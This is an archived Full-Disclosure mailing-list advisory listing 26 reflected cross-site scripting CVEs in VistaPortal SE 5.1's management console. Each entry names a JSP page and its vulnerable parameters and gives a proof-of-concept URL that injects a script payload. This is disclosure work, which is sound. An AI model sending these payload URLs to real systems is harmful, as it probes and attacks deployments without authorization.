| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 5 Dec 2018 12:00:01 +0100
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2018-19649, CVE-2018-19765 to CVE-2018-19775,
CVE-2018-19809 to CVE-2018-19822] - Multiple Cross Site Scripting
in VistaPortal SE Version 5.1 (build 51029)
Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766,
CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770,
CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774,
CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811,
CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815,
CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819,
CVE-2018-19820, CVE-2018-19821, CVE-2018-19822
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19649
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19765
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0
Vulnerable parameter: ConnPoolName, GroupId and ParentId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19766
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName
parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security
Resources&loginPath=_VP_Configuration,_VP_Security_Resources
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19767
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId
parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package
Vulnerable parameters: ConnPoolName and GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19768
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and
GroupId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages&loginPath=PagePackageMainFolder
http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page
Packages&loginPath=PagePackageMainFolder
Vulnerable parameters: ConnPoolName and GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19769
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "UserProperties.jsp" has reflected XSS via ConnPoolName.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User
Properties&loginPath=_VP_Configuration,_VP_User_Propertie
Vulnerable parameters: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19770
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Users.jsp" has reflected XSS via ConnPoolName.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista
Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups
Vulnerable parameters: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19771
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortal®
Database
Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection
Vulnerable parameter: PropName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19772
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0
Vulnerable parameter: ConnPoolName, GroupId and ParentId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19773
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentUser.jsp" has reflected XSS via GroupId and
ConnPoolName parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_
http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_
Vulnerable parameter: GroupId and ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19774
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName
parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U
Vulnerable parameter: GroupId and ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19775
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId
parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo
http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo
Vulnerable parameter: ConnPoolName and GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19809
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default
Vulnerable parameter: ConnPoolName, GroupId and type
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19810
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default
Vulnerable parameter: ConnPoolName and type
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19811
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via
ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19812
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via
GroupId parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F
Vulnerable parameter: GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19813
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P
Vulnerable parameter: ConnPoolName and GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19814
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P
Vulnerable parameter: ConnPoolName, GroupId and type
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19815
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS
via ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19816
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has
reflected XSS via ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19817
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected
XSS via ConnPoolName and GroupId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U
Vulnerable parameter: ConnPoolName and GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19818
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via
ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19819
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via
ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19820
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName
parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19821
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via
ConnPoolName parameter.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
Vulnerable parameter: ConnPoolName
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19822
# Category: webapps
1. Description
Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.
2. Proof of Concept
http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U
Vulnerable parameter: ConnPoolName and GroupId
3. Solution:
Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists